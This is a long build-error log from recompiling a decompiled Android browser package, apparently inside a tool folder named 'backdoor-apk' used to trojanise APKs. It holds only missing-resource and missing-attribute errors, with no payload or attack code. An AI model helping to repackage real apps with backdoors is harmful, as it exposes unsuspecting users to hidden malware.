/root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c8.xml:15: error: No resource identifier found for attribute 'animColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c8.xml:22: error: No resource identifier found for attribute 'animColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cc.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cc.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cc.xml:10: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cc.xml:12: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cc.xml:32: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cc.xml:34: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cc.xml:40: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cc.xml:42: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cc.xml:44: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cc.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cc.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cc.xml:10: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cc.xml:12: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cc.xml:32: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cc.xml:34: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cc.xml:40: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cc.xml:42: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cc.xml:44: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:6: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:6: error: No resource identifier found for attribute 'itemHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:9: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:9: error: No resource identifier found for attribute 'colOneTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:9: error: No resource identifier found for attribute 'colOneTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:9: error: No resource identifier found for attribute 'colOtherTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:9: error: No resource identifier found for attribute 'colOtherTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:9: error: No resource identifier found for attribute 'colTwoTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:9: error: No resource identifier found for attribute 'colTwoTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:9: error: No resource identifier found for attribute 'titleTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:9: error: No resource identifier found for attribute 'titleTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:9: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:9: error: No resource identifier found for attribute 'colWeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:10: error: No resource identifier found for attribute 'colOneTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:10: error: No resource identifier found for attribute 'colOneTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:10: error: No resource identifier found for attribute 'colOtherTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:10: error: No resource identifier found for attribute 'colOtherTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:10: error: No resource identifier found for attribute 'titleBgColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:10: error: No resource identifier found for attribute 'titleTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:10: error: No resource identifier found for attribute 'titleTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:10: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:10: error: No resource identifier found for attribute 'colWeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:10: error: No resource identifier found for attribute 'showGrid' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:20: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:20: error: No resource identifier found for attribute 'colOneTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:20: error: No resource identifier found for attribute 'colOneTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:20: error: No resource identifier found for attribute 'colOtherTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:20: error: No resource identifier found for attribute 'colOtherTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:20: error: No resource identifier found for attribute 'colTwoTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:20: error: No resource identifier found for attribute 'colTwoTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:20: error: No resource identifier found for attribute 'titleTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:20: error: No resource identifier found for attribute 'titleTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:20: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:20: error: No resource identifier found for attribute 'colWeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:36: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:36: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:36: error: No resource identifier found for attribute 'pressedColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:36: error: No resource identifier found for attribute 'textSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:38: error: No resource identifier found for attribute 'colOneTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:38: error: No resource identifier found for attribute 'colOneTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:38: error: No resource identifier found for attribute 'colOtherTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:38: error: No resource identifier found for attribute 'colOtherTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:38: error: No resource identifier found for attribute 'titleBgColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:38: error: No resource identifier found for attribute 'titleTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:38: error: No resource identifier found for attribute 'titleTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:38: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:38: error: No resource identifier found for attribute 'colWeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:38: error: No resource identifier found for attribute 'showGrid' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cf.xml:48: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/pull_to_refresh_listview_empty_page'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:6: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:6: error: No resource identifier found for attribute 'itemHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:9: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:9: error: No resource identifier found for attribute 'colOneTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:9: error: No resource identifier found for attribute 'colOneTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:9: error: No resource identifier found for attribute 'colOtherTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:9: error: No resource identifier found for attribute 'colOtherTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:9: error: No resource identifier found for attribute 'colTwoTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:9: error: No resource identifier found for attribute 'colTwoTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:9: error: No resource identifier found for attribute 'titleTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:9: error: No resource identifier found for attribute 'titleTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:9: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:9: error: No resource identifier found for attribute 'colWeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:10: error: No resource identifier found for attribute 'colOneTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:10: error: No resource identifier found for attribute 'colOneTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:10: error: No resource identifier found for attribute 'colOtherTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:10: error: No resource identifier found for attribute 'colOtherTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:10: error: No resource identifier found for attribute 'titleBgColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:10: error: No resource identifier found for attribute 'titleTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:10: error: No resource identifier found for attribute 'titleTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:10: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:10: error: No resource identifier found for attribute 'colWeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:10: error: No resource identifier found for attribute 'showGrid' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:20: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:20: error: No resource identifier found for attribute 'colOneTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:20: error: No resource identifier found for attribute 'colOneTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:20: error: No resource identifier found for attribute 'colOtherTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:20: error: No resource identifier found for attribute 'colOtherTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:20: error: No resource identifier found for attribute 'colTwoTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:20: error: No resource identifier found for attribute 'colTwoTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:20: error: No resource identifier found for attribute 'titleTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:20: error: No resource identifier found for attribute 'titleTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:20: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:20: error: No resource identifier found for attribute 'colWeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:36: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:36: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:36: error: No resource identifier found for attribute 'pressedColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:36: error: No resource identifier found for attribute 'textSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:38: error: No resource identifier found for attribute 'colOneTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:38: error: No resource identifier found for attribute 'colOneTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:38: error: No resource identifier found for attribute 'colOtherTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:38: error: No resource identifier found for attribute 'colOtherTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:38: error: No resource identifier found for attribute 'titleBgColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:38: error: No resource identifier found for attribute 'titleTextColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:38: error: No resource identifier found for attribute 'titleTextSize' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:38: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:38: error: No resource identifier found for attribute 'colWeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:38: error: No resource identifier found for attribute 'showGrid' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/cf.xml:48: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/pull_to_refresh_listview_empty_page'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ch.xml:24: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/ch.xml:24: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ch.xml:24: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cj.xml:6: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cj.xml:6: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cj.xml:9: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cj.xml:9: error: No resource identifier found for attribute 'itemHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cj.xml:10: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/football_live_league_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cp.xml:9: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cp.xml:17: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cp.xml:17: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cp.xml:17: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cp.xml:21: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cp.xml:21: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cp.xml:21: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cp.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/pull_to_refresh_listview_empty_page'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cp.xml:9: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cp.xml:17: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cp.xml:17: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cp.xml:17: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cp.xml:21: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cp.xml:21: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cp.xml:21: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cp.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/pull_to_refresh_listview_empty_page'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cw.xml:23: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cw.xml:23: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cw.xml:23: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cw.xml:27: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cw.xml:27: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cw.xml:27: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cw.xml:4: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/football_title_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/cw.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/pull_to_refresh_listview_empty_page'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cw.xml:23: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cw.xml:23: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cw.xml:23: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cw.xml:27: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cw.xml:27: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cw.xml:27: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cw.xml:4: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/football_title_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/cw.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/pull_to_refresh_listview_empty_page'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/d.xml:4: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/football_title_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/d.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/footballRadioButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/d.xml:10: error: Error: No resource found that matches the given name (at 'style' with value '@style/footballRadioButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/d.xml:12: error: Error: No resource found that matches the given name (at 'style' with value '@style/footballRadioButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/d.xml:14: error: Error: No resource found that matches the given name (at 'style' with value '@style/footballRadioButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/d.xml:16: error: Error: No resource found that matches the given name (at 'style' with value '@style/footballRadioButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/d0.xml:4: error: Error: No resource found that matches the given name (at 'style' with value '@style/gif_loading_pb'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/d3.xml:4: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/website_list_view_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/d3.xml:4: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/website_list_view_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/d7.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/d7.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dd.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dd.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dd.xml:11: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dd.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/dd.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/dd.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/dd.xml:11: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/dd.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dg.xml:14: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dg.xml:16: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/dg.xml:14: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/dg.xml:16: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: 